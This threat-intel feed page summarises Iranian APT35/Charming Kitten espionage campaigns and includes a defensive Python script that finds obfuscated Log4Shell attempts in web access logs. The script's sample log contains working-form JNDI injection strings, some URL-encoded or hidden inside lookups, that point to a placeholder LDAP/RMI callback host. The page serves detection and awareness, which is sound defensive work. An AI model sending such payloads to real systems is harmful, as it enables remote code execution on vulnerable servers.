Threats Feed
Iranian APT Impersonates German Model Agency in Espionage Operation
Suspected Iranian threat actors, likely linked to APT35 (Agent Serpens), created a fraudulent website impersonating Germany’s Mega Model Agency to conduct targeted espionage. The site collects extensive visitor data—including IP addresses, browser fingerprints, and screen resolutions—using obfuscated JavaScript to enable selective targeting. A fake model profile and inactive album link suggest planned social engineering attacks. Although no victim interaction was confirmed, the infrastructure and tactics indicate preparation for spear phishing. The campaign targets dissidents, journalists, and activists abroad, especially in Germany, aligning with the group’s history of surveillance and influence operations against Iranian opposition figures.
APT35 Targets Aerospace and Semiconductor Sectors Across Multiple Countries
APT35 targeted the aerospace and semiconductor industries in the US, Thailand, UAE, and Israel using fake recruitment and corporate websites. These sites delivered malware as trojanized copies of legitimate programs bundled with malicious DLLs. The group leveraged GitHub, OneDrive, and Google Cloud for C&C communications and payload delivery. In a related attack, a semiconductor company was targeted with a VPN program laced with malicious components. Persistence was achieved through registry modifications, and obfuscation was used to evade detection. APT35’s activities are linked to Iran’s Islamic Revolutionary Guard Corps (IRGC).
Charming Kitten’s TA455 Uses Social Engineering to Spread Malware in Aerospace Sector
ClearSky Cyber Security's research details an Iranian cyber campaign, dubbed "Iranian Dream Job," that uses fake job postings to target the aerospace industry. The campaign, active since at least September 2023, uses the SnailResin loader to deploy the SlugResin backdoor. Attribution is complex, with potential links to both the Iranian group TA455 (a Charming Kitten subgroup) and North Korea's Lazarus group, raising the question of collaboration or deliberate false-flagging. The campaign leverages fake LinkedIn profiles and websites, distributing malware via seemingly legitimate ZIP files that contain a malicious executable. The attack relies on social engineering and DLL side-loading for infiltration.
Charming Kitten Targets Global Sectors with Sponsor Backdoor
Charming Kitten, an Iran-nexus threat actor group, used the Sponsor backdoor to target 34 entities across Brazil, Israel, and the UAE. Initial access was gained by exploiting the Microsoft Exchange ProxyLogon vulnerability (CVE-2021-26855). The campaign targeted a wide range of sectors, including automotive, communications, engineering, financial services, healthcare, insurance, legal, manufacturing, retail, technology, and telecommunications. The Sponsor backdoor, disguised as an updater program, was staged with discreetly deployed batch files to evade detection. Charming Kitten also deployed Plink, the Merlin agent, Mimikatz, and Meterpreter reverse shells.
Charming Kitten's Cyber Arsenal: Tools and Techniques Explained
The Iranian APT group Charming Kitten (APT35) targets human rights activists, academia, media organizations, and political entities in the US and Middle Eastern countries. Notable attacks include the 2017 HBO hack, which led to leaked unaired TV episodes, and 2019 attempts to compromise email accounts associated with a US presidential campaign ahead of the 2020 election. Tools used by APT35 include DownPaper, which relies on PowerShell and registry manipulation, Mimikatz for credential dumping, PsExec for remote execution, and PupyRAT, a cross-platform remote access tool delivered through phishing.
Charming Kitten Exploits Phishing to Target Global Academia and Activists
This Certfa Lab report details the cyber espionage activities of Charming Kitten (APT42), an Iranian state-sponsored hacking group. The report focuses on four specific operations ("Alfa," "Bravo," "Charlie," and "Delta"), illustrating how Charming Kitten uses sophisticated social engineering, primarily impersonating prominent individuals on LinkedIn and Twitter, to build trust with targets before delivering malicious links disguised as innocuous meeting requests or research materials. The attacks consistently leverage phishing to steal credentials, targeting researchers, academics, activists, and journalists with a particular focus on the Middle East and North Africa. The report aims to raise public awareness of Charming Kitten's tactics and provide recommendations for enhancing online security, particularly emphasizing the use of multi-factor authentication.
CharmPower: APT35's Modular Toolset Exploits Log4j Vulnerability
APT35 began widespread scanning and exploitation attempts against the Log4j vulnerability (Log4Shell, CVE-2021-44228) in internet-facing systems only four days after it was disclosed. The group used a modular PowerShell-based framework dubbed CharmPower for persistence, information gathering, and command execution.
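The scan-and-exploit wave described above leaves traces in ordinary web server logs, but a literal search for `${jndi:` misses most of it because scanners URL-encode the payload and nest it in lookups such as `${lower:j}` or `${::-j}` that Log4j resolves to a letter. The Python script below is an added example written for this page, not code from Check Point's report or from CharmPower; its access-log lines are constructed, with RFC 5737 documentation addresses. It decodes and collapses those lookups until the string stabilizes, then extracts the JNDI scheme and callback target, so it finds the obfuscated variants as well as the plain one.

```python
import re
import urllib.parse

# Constructed Apache-style access-log lines for the demo (not from any report).
# Line 2: plain payload in the User-Agent. Line 3: URL-encoded payload with a
# ${lower:j} wrapper in the query string. Line 4: every letter of "jndi:rmi"
# hidden in ${::-x} default-value lookups. Line 5: a non-JNDI lookup probe.
SAMPLE_LOG = """\
203.0.113.7 - - [14/Dec/2021:10:02:11 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [14/Dec/2021:10:02:12 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.9:1389/a}"
203.0.113.7 - - [14/Dec/2021:10:02:13 +0000] "GET /?x=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F203.0.113.9%3A1389%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"
203.0.113.7 - - [14/Dec/2021:10:02:14 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://203.0.113.9:1099/c}"
198.51.100.4 - - [14/Dec/2021:10:03:00 +0000] "GET /search?q=%24%7Bjava%3Aversion%7D HTTP/1.1" 200 88 "-" "Mozilla/5.0"
"""

# Lookups that evaluate to a literal and are used to hide "jndi" from naive filters.
# The character class excludes $, { and }, so each pass resolves innermost lookups first.
DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")            # ${env:X:-j}, ${::-j}
CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.I)  # ${lower:J}
JNDI = re.compile(r"\$\{jndi:(ldaps?|rmi|dns|iiop|corba|nds|https?)://([^}\s]+)\}", re.I)


def normalize(text: str, max_rounds: int = 20) -> str:
    """Undo (possibly repeated) URL encoding and collapse literal-valued lookups until stable."""
    for _ in range(max_rounds):
        before = text
        text = urllib.parse.unquote(text)
        text = DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
        text = CASE_LOOKUP.sub(lambda m: m.group(1), text)
        if text == before:
            break
    return text


def find_jndi(text: str) -> list[tuple[str, str]]:
    """Return (scheme, target) for every JNDI lookup present after normalization."""
    return [(m.group(1).lower(), m.group(2)) for m in JNDI.finditer(normalize(text))]


def scan_log(log: str) -> list[dict]:
    """Flag every log line carrying a JNDI lookup anywhere (request line, referer or user agent)."""
    hits = []
    for line_no, line in enumerate(log.splitlines(), start=1):
        client_ip = line.split(" ", 1)[0]
        for scheme, target in find_jndi(line):
            hits.append({"line": line_no, "client_ip": client_ip, "scheme": scheme, "target": target})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['client_ip']} -> {hit['scheme']}://{hit['target']}")
```

The extracted target is the attacker-controlled LDAP/RMI listener, which is the indicator worth pivoting on across the estate; the `${java:version}` probe on the last line is left unflagged here, though some teams treat any `${...:...}` lookup in a request as reconnaissance.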
APT35 Cyber Espionage: From Phishing to Spyware and Beyond
APT35 has used multiple tactics to compromise high-value targets. The group has used hijacked websites, such as one affiliated with a UK university, for credential phishing. It has also uploaded spyware disguised as VPN software to app stores and impersonated conference officials to conduct phishing campaigns. Additionally, APT35 has embedded link shorteners and click trackers in PDF files and abused Google Drive, Apps Script, and Sites pages. In a newer approach, the group embeds JavaScript in its phishing pages that calls the Telegram Bot API's sendMessage function, notifying operators in real time when a target loads the page and passing along visitor details such as IP address, user agent, and location.